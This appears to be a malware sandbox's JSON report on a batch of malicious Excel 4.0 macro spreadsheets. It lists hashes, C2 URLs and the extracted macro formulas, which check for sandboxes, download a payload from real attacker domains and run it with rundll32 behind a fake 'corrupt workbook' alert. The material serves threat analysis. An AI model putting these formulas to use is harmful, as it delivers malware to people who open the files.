{"version":"0.2","sample":{"sample":"","kind":"file","target":"994c00a74bef93d5b9eb6d07af0bf0a007a38f9854645cdc25561f467fd0fd1e"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"994c00a74bef93d5b9eb6d07af0bf0a007a38f9854645cdc25561f467fd0fd1e","filesize":185344,"md5":"40749645424b5f0596b8c26a4fb3187c","sha1":"f249549c5152157f75dc9a7958e16a484a48f45b","sha256":"994c00a74bef93d5b9eb6d07af0bf0a007a38f9854645cdc25561f467fd0fd1e","sha512":"f1344be426443d40b7b535ec3b88edf69cb4a89844b0a0a2361d57b7c034598c3e918096ba788ee6989b45cc1f34b8ce51f5ec9d032dcb14788ece07deceed9e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"994c00a74bef93d5b9eb6d07af0bf0a007a38f9854645cdc25561f467fd0fd1e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"994c311975ec7c30b86f27109f387d56469a1ac3de27b475bad240a1ac2aaa38"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"994c311975ec7c30b86f27109f387d56469a1ac3de27b475bad240a1ac2aaa38","filesize":167424,"md5":"11d7d85e01d11c1181a462963a84e05e","sha1":"2855f172175b871a3ee0a75ffa5794cbb42b1111","sha256":"994c311975ec7c30b86f27109f387d56469a1ac3de27b475bad240a1ac2aaa38","sha512":"27f7f7f61601875ff236ea2d8eb1cadcdcf3e8e13bea65f9031fee76a9a18982d6f56df0ea8970aeabf468ee9e6541d369b6ee339bfaf596292a54660584a5b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"994c311975ec7c30b86f27109f387d56469a1ac3de27b475bad240a1ac2aaa38.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"g5HlhEZKoY\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"99525d06f24aeaa85bada6ab0203b0f8061304997eaa2ac9ac8e5d6350c8ea68"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"99525d06f24aeaa85bada6ab0203b0f8061304997eaa2ac9ac8e5d6350c8ea68","filesize":209920,"md5":"2611dd8a20b11f10aced8da7d2159ddf","sha1":"b845688961403d96b0c76672c94827f66b592bf2","sha256":"99525d06f24aeaa85bada6ab0203b0f8061304997eaa2ac9ac8e5d6350c8ea68","sha512":"9148a44b57433db1123af9f4e7d6577eb2ac72fe91df6723112a82d726791917d0eeb65428d0eb757b9c6299f7403ea221d4cf861054f4edd93093c2a1aa33c4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"99525d06f24aeaa85bada6ab0203b0f8061304997eaa2ac9ac8e5d6350c8ea68.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YjqKafPh2k\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"99554a9e16b04d9b946b115892365ee6a94d791f4df4ac3546ba069e0ea0f57c"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"99554a9e16b04d9b946b115892365ee6a94d791f4df4ac3546ba069e0ea0f57c","filesize":206336,"md5":"bda8ec98d0beb984c82a328d01b21c49","sha1":"cba9c72bb66dd2db84fa20e4861152f7c69f9bcc","sha256":"99554a9e16b04d9b946b115892365ee6a94d791f4df4ac3546ba069e0ea0f57c","sha512":"a24da54291ed7f640e3c027d399d0294b2940a44da18e171e8ff12b8682d5e4e701f3c26c3d2320f1defc8894c27ee61087e61fa51e1f9864a6e077f3e83dd25","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"99554a9e16b04d9b946b115892365ee6a94d791f4df4ac3546ba069e0ea0f57c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9A8YsCxWGl\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"999a6409a45da7aea25c86684bcebd88da476aa167099dafcbf132f0f67054b8"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"999a6409a45da7aea25c86684bcebd88da476aa167099dafcbf132f0f67054b8","filesize":209920,"md5":"a52f6743fcd327b6f4e20ba73d7fcb81","sha1":"3eaefe6d3a8a4a7b0d6fb0a7d28db5a5af49e47c","sha256":"999a6409a45da7aea25c86684bcebd88da476aa167099dafcbf132f0f67054b8","sha512":"f68476822c7ec37d0019d0b6d31ba93b7f097c7486d954625c712120050c7fc78a71ef28398eee9b18aa1b82be3952be0cc9730095d60959afd6decab6850a1b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"999a6409a45da7aea25c86684bcebd88da476aa167099dafcbf132f0f67054b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"J8BO28sW4M\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"99bf154155f0c52979297f7e60f5eee381702fb020d4efbb6775975869925da7"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"99bf154155f0c52979297f7e60f5eee381702fb020d4efbb6775975869925da7","filesize":167936,"md5":"3f908abf5abc302b57ef86667edfb7a2","sha1":"90e793522059bfe1d71dd691807eb08877540e5a","sha256":"99bf154155f0c52979297f7e60f5eee381702fb020d4efbb6775975869925da7","sha512":"ccb3444d1961bfeb89f336552f597271a9f7a2139b61992e7f17f129b1990640a730f31922dd99318049d3e10308ccb1edc89e85c82028331d689c1b893279bb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"99bf154155f0c52979297f7e60f5eee381702fb020d4efbb6775975869925da7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cE44QCBWVM\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"99c32cfdb9c5cf33a13f46777375fed1b002e463ee6f187785274a4f4242f661"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"99c32cfdb9c5cf33a13f46777375fed1b002e463ee6f187785274a4f4242f661","filesize":167936,"md5":"c0caf8041988896b12135358ae5614aa","sha1":"a3276dae225cad1b03693bb03f24d03c226cd6f5","sha256":"99c32cfdb9c5cf33a13f46777375fed1b002e463ee6f187785274a4f4242f661","sha512":"05799f25b63bc53d264e7b521c22a82ab29bf5207fcaae7b39c109add385a7b4e33d216875e1d74a93e3a2dcb131595a299d6fae176a1f68b8dd38fe42dffed0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"99c32cfdb9c5cf33a13f46777375fed1b002e463ee6f187785274a4f4242f661.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1k5ioxaDbg\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"99f875da8a67e86046ea79b74fcd0735554e674ffa5e253b2ced65ef340509ef"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"99f875da8a67e86046ea79b74fcd0735554e674ffa5e253b2ced65ef340509ef","filesize":167424,"md5":"93f2640443ee9f13933d85b7b7f10d3b","sha1":"593d51298c12b4f20fcb3bb2be85b318b145fe4c","sha256":"99f875da8a67e86046ea79b74fcd0735554e674ffa5e253b2ced65ef340509ef","sha512":"0a5ec90264c9c3c3ba988ec4f066a1671cc91b33cc4e2bf78a046a1bff1a9711484f09f372e84d0becbbc3e2ecc30f9d33ec03139d073ad8ee8fab8c377bdbca","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"99f875da8a67e86046ea79b74fcd0735554e674ffa5e253b2ced65ef340509ef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"DT9Fjpo3uV\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a01474990a350aa1cd87ac4055f5732aff45246de575f8a000b6d630b0d0be0"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"9a01474990a350aa1cd87ac4055f5732aff45246de575f8a000b6d630b0d0be0","filesize":168448,"md5":"6368d456dfae2166f2f7c476bd8c6b0b","sha1":"dd675e3b1f8e9a3f85fffe7c147a0476c5e76d65","sha256":"9a01474990a350aa1cd87ac4055f5732aff45246de575f8a000b6d630b0d0be0","sha512":"0c1bf63f8f7bfeffb6ee07741011d20bd36b388ca6566532532c3463cc49075c8f3a60ab64039005966accaa626a23712017fa8a49a535f7b4ddbaad8b6e8d22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a01474990a350aa1cd87ac4055f5732aff45246de575f8a000b6d630b0d0be0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Surrjqwpsq\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a146edbd409e2d54a267a12ea588e3c4ffe6caa02ca1f069c21860f5de0ded3"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"9a146edbd409e2d54a267a12ea588e3c4ffe6caa02ca1f069c21860f5de0ded3","filesize":209920,"md5":"2449cb925c4509146654ffbeb80a6787","sha1":"5c4dc727d5bc16abb85e1a7b1fe90f241d8745fc","sha256":"9a146edbd409e2d54a267a12ea588e3c4ffe6caa02ca1f069c21860f5de0ded3","sha512":"a52bcfa4127659308eb6cfa6687a07ac3b88b22f9f7ad78b9477b14cf1e521e217d04a85b7a358bbf91e074dffaf0041fe4f80372a367a1ab8d3ea720a4c63ae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a146edbd409e2d54a267a12ea588e3c4ffe6caa02ca1f069c21860f5de0ded3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uLcsIVPIf2\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a1b693a9d0503ecb99c19eb09c3b3cd6555093760a3b27a7d96194fd0531e06"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"9a1b693a9d0503ecb99c19eb09c3b3cd6555093760a3b27a7d96194fd0531e06","filesize":206336,"md5":"1439522c96d0da723869538448fba311","sha1":"2a0e48a4a27ae7f6649619f9c04f272270463e8b","sha256":"9a1b693a9d0503ecb99c19eb09c3b3cd6555093760a3b27a7d96194fd0531e06","sha512":"0bd6b773f8ce1987ee3f5a7cff0bc098e02c4f9fd9f4bc213bf07ed830bea2a928a6e3d3070abb09b5e2118fecc628310006d1295f6d41ccbde0828f2caec9f7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a1b693a9d0503ecb99c19eb09c3b3cd6555093760a3b27a7d96194fd0531e06.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"c93Ib1LZj0\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a4c7ff5f3273f8d6a54effca29ecb55e0babc2d35c065c3a7160695fcd8f6e6"},"analysis":{"reported":"2020-04-09T16:17:54Z","score":10},"files":[{"filename":"9a4c7ff5f3273f8d6a54effca29ecb55e0babc2d35c065c3a7160695fcd8f6e6","filesize":170496,"md5":"d1c335ecd086e389f96d79475b54a8e2","sha1":"ccd99b99f10be62ccedf4a3a4e5699bf51e632fd","sha256":"9a4c7ff5f3273f8d6a54effca29ecb55e0babc2d35c065c3a7160695fcd8f6e6","sha512":"2144c9cbc6c05641ca5f28c7b1a6d0ab34edd53a0c3ed6b8d72005d92ab22f07d76a7774efb330df4803fa1d8a70a9d2adb532e8e22d63242f016cc3fb5f9b2a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a4c7ff5f3273f8d6a54effca29ecb55e0babc2d35c065c3a7160695fcd8f6e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nJEsv7TJjG\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a4da0529720b065bd2a57142f01e3334345da4b2401fb4d9db26366a41759a8"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9a4da0529720b065bd2a57142f01e3334345da4b2401fb4d9db26366a41759a8","filesize":160768,"md5":"9333ea469e0edd3da7768f70598fc3dd","sha1":"a36b354a76be6b8634abab7348834ded60ae9923","sha256":"9a4da0529720b065bd2a57142f01e3334345da4b2401fb4d9db26366a41759a8","sha512":"f7c31587c18f30ed04e4c2ea9f5b525d3639b8b3b77bd4e64b350737d713b28368dff28632d3432c03f3e58146281c1d96d2b3fbb381b8075b312d9729cb7333","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a4da0529720b065bd2a57142f01e3334345da4b2401fb4d9db26366a41759a8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"m46eLjHvJl\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9a5759335bc215cf48daac76b226b5bfa54e2f7d77b28d7a0649a2245fc799ce"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9a5759335bc215cf48daac76b226b5bfa54e2f7d77b28d7a0649a2245fc799ce","filesize":171008,"md5":"6678701eedb21eb29292932770c7a284","sha1":"c30e5018b4056cd40ecf108441ac6adb3fc2ceb6","sha256":"9a5759335bc215cf48daac76b226b5bfa54e2f7d77b28d7a0649a2245fc799ce","sha512":"6dfd1e267a236f1a95422ffc25205cc1937b39b98423c693fc0591c5664c37379dc6813d66a926ea3d5f16a71cf8a240548e306640c6aeb29bcdd7dd18403247","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9a5759335bc215cf48daac76b226b5bfa54e2f7d77b28d7a0649a2245fc799ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JqZ0JXK9YT\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
